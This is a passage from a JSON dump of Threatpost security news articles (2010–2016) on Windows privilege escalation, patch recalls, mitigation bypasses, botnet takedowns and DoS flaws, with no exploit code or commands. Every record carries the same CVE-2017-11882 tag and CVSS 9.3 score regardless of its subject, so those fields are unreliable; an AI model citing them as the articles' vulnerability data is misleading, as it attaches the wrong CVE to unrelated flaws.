{}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:23", "description": "Microsoft\u2019s problems with [Token Kidnapping](<http://www.argeniss.com/research/TokenKidnapping.pdf>) [.pdf] on the Windows platform aren\u2019t going away anytime soon.\n\nMore than a year after Microsoft issued a [patch](<http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx>) to cover privilege escalation issues that could lead to complete system takeover, a security researcher plans to use the Black Hat conference spotlight to expose new design mistakes and security issues that can be exploited to elevate privileges on all Windows versions including the brand new Windows 2008 R2 and Windows 7.\n\nCesar Cerrudo, founder and CEO of Argeniss, a security consultancy firm based in Argentina, first reported the token kidnapping hiccup to Microsoft in 2008 and after waiting in vain for a patch, he released the details during the [Month of Kernel Bugs](<http://projects.info-pull.com/mokb/MOKB-06-11-2006.html>) project.\n\nThe flaw would eventually be [exploited in active attacks](<http://www.zdnet.com/blog/security/one-year-old-unpatched-windows-token-kidnapping-under-attack/2894>), leading to a mad scramble at Redmond to come up with a fix and a subsequent [disclosure flap](<http://www.zdnet.com/blog/security/responsible-disclosure-the-microsoft-way/157>) that exposed Microsoft as the irresponsible party.\n\nThis year, Cerrudo plans a new talk titled \u201cToken Kidnapping\u2019s Revenge\u201d where he will discuss how attackers can even bypass certain Windows services protections.\n\nIn an interview with Threatpost, Cerrudo said the presentation will discuss about a half-dozen vulnerabilities in all Windows versions from XP to Windows 7 that can be exploited to elevate privileges by any user with impersonation rights. \n\nThe explanation:\n\n_Most Windows services accounts have impersonation rights. Because impersonation rights are needed these are not critical, high risk vulnerabilities, regularWindows users can\u2019t exploit them. Some applications are more susceptible to exploitation of these vulnerabilities than others, for instance, if you can upload ASP web pages with exploit code to a MS Internet Information Server (IIS) 6, 7 or 7.5 running in default configuration you will be able to fully compromise the Windows server. _\n\nFor example, if you are an SQL Server administrator (which is not a Windows administrator) you can exploit these vulnerabilities from SQL Server and fully compromise the Windows server. \n\nCerrudo said the vulnerabilities can be exploited to bypass new Windows services protection to help in post-exploitation scenarios too where an attacker is able to run code after exploiting a vulnerability in a Windows service but he is not able to compromise the whole system due to these protections.\n\nOne of the issues Cerrudo plans to present at Black Hat even allows him to bypass one of the Microsoft\u2019s fixes for previous Token Kidnapping vulnerabilities on Windows 2003.\n\n[block:block=47]\n\n\u201cMicrosoft is aware of these issues (and other local privilege elevation issue that can be exploited by any user but I won\u2019t be talking about it before the fix) and they will be releasing fixes and advisories in August,\u201d Cerrudo explained.\n\nThe researcher also plans to release two exploits (called Chimichurri and Churraskito) for IIS and SQL Server. These exploits could work on other services too with some minor modifications, he said.\n\n\u201cThe presentation is not only about the vulnerabilities and the exploits. I will be showing step by step how I found the vulnerabilities, with what tools and techniques, so participants can learn and walk away knowing how to find these kind of vulnerabilities by themselves,\u201d Cerrudo added.\n", "cvss3": {}, "published": "2010-07-16T15:42:06", "type": "threatpost", "title": "MS Windows Token Kidnapping Problems Resurface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:32", "id": "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "href": "https://threatpost.com/ms-windows-token-kidnapping-problems-resurface-071610/74221/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it. \n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** \nper se. Instead, they are describing a way for an attacker to more \neasily exploit security vulnerabilities that must already be present on \nthe system. It\u2019s a subtle point, but one that folks should really \nunderstand. The protection mechanisms that are present in the Windows \nkernel are rendered less effective inside of a virtual machine as \nopposed to a physical machine. There is no vulnerability introduced, \njust a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time. \n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine. \n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are \nabout the now-exposed (incorrect) assumption that various security \nmechanisms will always be in place. It\u2019s obvious that a complete \nre-calibration of exploit potential for uncategorized bugs will become \nnecessary if vulnerabilities like the one described here remain in our \nfielded systems. Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT. \n\n\u201cIn our view, design and architecture decisions made for Virtual PC \ncompletely invalidate some basic assumptions about processes in modern \nWindows operating systems. Like falling dominoes, this in turn \ninvalidates almost all anti-exploit mechanisms that Microsoft has built \ninto their OS over the past decade, which then topples over and turns an \nentire class of bugs deemed un-exploitable on non-virtualized systems \ninto potential vulnerabilities on virtualized systems. Backwards time \nwarp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows \nit down,\u201d Dai Zovi said during his RSA talk.\u201dBut preventing the introduction of malicious code \nisn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per \nse_\u2018 because the problem described only affects \u201csecurity-in-depth\u201d \nmechanisms and attackers would need to find and exploit an actual \nimplementation bug to leverage it. Even if Microsoft is right on that \ncount (which we don\u2019t think they are), they are ignoring the bigger \nissue of assumptions. Bugs previously deemed non-exploitable for \nanything other than crashing systems are now potentially exploitable \nunder a virtualized OS. Because of the way bugs are slated for \nmitigation in the real world, a majority of those bugs remain unpatched \u2014 \na problem of prioritization and the enormity of the bug pile in \napplications,\u201d McGraw and Arce conclude.\n", "cvss3": {}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:41", "description": "**UPDATE** \u2013 Calling it the company\u2019s \u201cmost aggressive\u201d botnet operation operation to date, Microsoft has joined with the FBI for a massive disruption of the Citadel botnet.\n\nMore than 1,400 individual botnets associated with the Citadel malware affecting more than five million people in total were disrupted, with cooperation from the Federal Bureau of Investigation and interestingly, a civil seizure warrant issued by the U.S. District Court for the Western District of North Carolina.\n\nGroups like the Financial Services \u2013 Information Sharing and Analysis Center (FS-ISAC), NACHA \u2013 The Electronic Payments Association, the American Bankers Association (ABA) and Agari, an email phishing authentication firm, all helped chip in intelligence as well.\n\nWhile this was the seventh botnet operation of its kind coordinated by Microsoft, this is the first time the company has worked with the law enforcement sector to secure a civil seizure warrant to carry out its plans.\n\nRichard Boscovich, the Assistant General Counsel of Microsoft\u2019s Digital Crimes Unit wrote about the operation \u2013 codenamed Operation b54 \u2013 on [the company\u2019s Technet blog](<http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx>) last night claiming the action won\u2019t fully eradicate the Citadel malware but should \u201csignificantly\u201d curb the botnet going forward.\n\n\u201cDue to Citadel\u2019s size and complexity, we do not expect to fully take out all of the botnets in the world using the Citadel malware,\u201d he wrote, \u201chowever, we do expect that this action will significantly disrupt Citadel\u2019s operation.\u201d\n\nTechnical details on the operation are somewhat scant but Microsoft says the operation culminated yesterday after officials from Microsoft, assisted by U.S. Marshalls helped remove servers from two data hosting facilities in New Jersey and Pennsylvania. The takedown was set into motion last week after the North Carolina court order successfully cut off communication between the Citadel botnets, 1,462 in total, and their infected machines.\n\nAgari, a Palo Alto-based email phishing authentication firm had a big hand in helping Microsoft obtain the seizure warrant.\n\nWhile the full operation took about a year, Agari spent six of those months poring over phishing emails that were pulling unsuspecting users into the Citadel botnet.\n\nAgari CEO Patrick Peterson described how the company helped monitoring emails that led to the seizure of the servers in Pennsylvania and New Jersey.\n\n\u201cOur whole system is designed to isolate these malicious emails and to get that forensic data for law enforcement, for our customers, for the industry to be able to track the bad guys,\u201d Patterson explained, \u201cIn this case working with our partners, the FBI, Microsoft, FS-ISAC, we were able to customize the focus of that specifically around that Citadel botnet.\u201d\n\nThe company monitored approximately 2.5 million malicious URLs every month and while not every one of those URLs led to the Citadel malware, all of them were pretending to come from a legitimate bank.\n\nAgari is part of FS-ISAC\u2019s Trusted Registry Program, a program dedicated to securing the emails the financial services industry sends out. FS-ISAC reached out to Microsoft about Agari\u2019s wealth of phishing emails and the company joined the investigation from there.\n\n\u201cI think it\u2019s a great day for everyone involved,\u201d Peterson said, \u201cIt\u2019s certainly a day when everyone on the internet is safer than they were yesterday and that doesn\u2019t happen very often.\u201d\n\nThe Citadel Trojan has been spotted mining all types of financial information, including banking logins and passwords since [being introduced a year and a half ago](<http://threatpost.com/citadel-malware-authors-adopt-open-source-development-model-020812/>). To date it\u2019s believed the botnet is responsible for more than half a billion dollars in financial loss.\n\nPeddled primarily on a handful of underground forums as a variant of the Zeus Trojan, the malware has long been cloaked in secrecy. Owners insist on distributing their kit among trusted insiders, [h0ping to keep law enforcement out and support costs down](<http://threatpost.com/citadel-trojan-updates-dynamic-config-mechanism-streamlines-fraud-activity-101812/>).\n\nMicrosoft has taken a hard line on cybercrime over the last several years and much of that is due to [the work being done by its Digital Crimes Unit](<http://threatpost.com/at-microsoft-a-sharpened-focus-on-cybercrime/>). The DCU, a collection of Microsoft engineers, security experts and lawyers, have proved successful at shutting down botnets that are largely dependent on a centralized infrastructure including Kelihos, Zeus, Waledac and Rustock.\n\nIn [a discussion with Threatpost\u2019s Dennis Fisher last month](<http://threatpost.com/qa-microsofts-tj-campana/>), T.J. Campana, the DCU\u2019s Director of Security claimed the group tries to take a transparent approach with their takedowns.\n\n\u201cWe\u2019re not just going out there shooting stuff. We walk in with a pile of legal documents. We\u2019re asking for a judge to agree with what we found,\u201d Campana said of the group\u2019s actions at the time.\n", "cvss3": {}, "published": "2013-06-06T13:38:55", "type": "threatpost", "title": "Operation b54 Knocks 1,000+ Citadel Botnets Offline", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-06-10T19:43:44", "id": "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "href": "https://threatpost.com/microsoft-authorities-disrupt-hundreds-of-citadel-botnets-with-operation-b54/100902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft has implemented mitigations to address memory related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delay Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.\n\n> DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fbypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie%2F110570%2F&text=DeMott%26%238217%3Bs+bypass+works+through+the+use+of+what+he+calls+a+%26%238220%3Blong-lived+dangling+pointer.%26%238221%3B>)\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. \u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-live type and can basically upgrade it to an existing attack to bypasses these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. \u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:05", "description": "For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.\n\nThe official end of security support for Windows XP is upon us, but it\u2019s important to check some anxiety at the door and keep some perspective.\n\n\u201cI\u2019ve been a forensics investigator 14 years and in my experience, I don\u2019t know I\u2019ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn\u2019t the source of a breach,\u201d said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall and a glaring hole in the underlying operating system.\n\n\u201cAll the administration stuff in place around these systems falls down. Attackers leverage that because they want the path of least resistance,\u201d Pogue said. \u201cYou have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. There are a whole lot of items that have to line up for that to happen.\u201d\n\nThe hype and hyperbole around April 8, the latest in a long line of security Doomsdays, is rooted in theories that because a good number of XP systems remain in use storing data and processing transactions, that any previously unreported XP vulnerabilities will be perpetual zero-days. The theory continues that attackers have been building and hording XP exploits, anxiously wringing their hands waiting for April 8, 2014 to come and go.\n\nNow to dismiss all of that as FUD is foolhardy; some attackers who do have [XP exploits that will be zero days](<http://threatpost.com/microsoft-to-fix-word-zero-day-with-final-xp-patch/105241>) in a matter of five days are going to wait. Others are less patient (see the recent [XP Rich Text Format zero day](<http://threatpost.com/targeted-attacks-exploit-microsoft-word-zero-day/104980>) that will be patched on Tuesday). And for those smaller organizations with fewer IT resources that may still be running XP machines that still hum along carrying out their mission day after day, their risk posture will be slouching a little more come Tuesday.\n\nBig picture, however, people are moving off of XP. Qualys CTO Wolfgang Kandek published some numbers based off the company\u2019s flagship vulnerability scanning service that indicate the XP installed base had dipped to below 15 percent, down from 35 percent 14 months ago. Migrations in the transportation and health care industries are much more dramatic, he said.\n\n\u201cThese are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,\u201d Kandek said.\n\nKandek is in the camp that attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems and determine whether those vulnerabilities could be present in no-longer supported XP machines. He also urges organizations that must use XP to isolate those machines off the network, keep them for a specialized purpose and keep them offline.\n\n\u201cIn May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask \u2018What does fix?\u2019 And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL exist or overflow vulnerability exists,\u201d Kandek said. \u201cPatches map to vulnerabilities that could be in XP. Sometimes they\u2019re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n\nA key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that live in Windows 7 or 8 just may not be the best use of resources for an attacker.\n\n\u201cAn attacker has always chose the path of least resistance to gain access to a system; they don\u2019t have to exploit the operating system, and for the most part, haven\u2019t,\u201d Trustwave\u2019s Pogue said. \u201cWhile it\u2019s still possible, if I were a small business owner and running XP to store and process data, I\u2019d be concerned about it and take steps run and updated and patched operating system. Even so, it\u2019s important to remember that\u2019s not a silver bullet. Updating to Windows 7 doesn\u2019t mean you\u2019re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I\u2019ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.\u201d\n", "cvss3": {}, "published": "2014-04-04T12:13:55", "type": "threatpost", "title": "Windows XP End of Life Breeding FUD, Legit Concerns", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-07T17:28:37", "id": "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "href": "https://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:06", "description": "**[](<https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/>)UPDATED** Microsoft on Thursday plans to release an emergency out-of-band update to address a vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. The vulnerability affects a wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they\u2019re releasing the patch now because they\u2019re expecting exploit code to be released in the near future.\n\nThe vulnerability was discussed at the Chaos Communications Congress conference in Germany earlier this week, although some form of the problem has been known for several years. In addition to ASP.NET, the flaw affects a number of other languages and platforms, including Java, Ruby, Apache Tomcat and the V8 JavaScript engine.\n\nMicrosoft pushed the [patch out for the vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms11-100>) on Thursday afternoon, and recommended that customers with vulnerable installations deploy the patch immediately.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Susha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\n\u201cThe root cause of the vulnerability is a computationally expensive hash table insertion mechanism triggered by an HTTP request containing thousands and thousands of form values. Therefore, any ASP.NET website that accepts requests having HTTP content types application/x-www-form-urlencoded or multipart/form-data are likely to be vulnerable. This includes the default configuration of IIS when ASP.NET is enabled and also the majority of real-world ASP.NET websites.\u201d\n\nIn its [advisory on the ASP.NET issue](<https://technet.microsoft.com/en-us/security/advisory/2659883>), Microsoft suggests a workaround for the problem. The workarounds decreases the maximum size of a request that the server will accept, which lowers the likelihood of the server being susceptible for the attack.\n\n\u201cThis configuration value can be applied globally to all ASP.NET sites on a server by adding the entry to root web.config or applicationhost.config. Alternatively, this configuration can be restricted to a particular site or application by adding it to a web.config file for the particular site or application,\u201d the advisory says.\n\nThe security researchers who published details of the vulnerability, Alexander Klink and Julian Walde, also discuss workarounds and mitigations for the problem in [their paper](<http://www.nruns.com/_downloads/advisory28122011.pdf>). \n", "cvss3": {}, "published": "2011-12-29T15:31:23", "type": "threatpost", "title": "Microsoft to Release Emergency Fix for ASP.NET DoS Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:05", "id": "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "href": "https://threatpost.com/microsoft-release-emergency-fix-aspnet-dos-flaw-122911/76039/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "[](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>)Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday 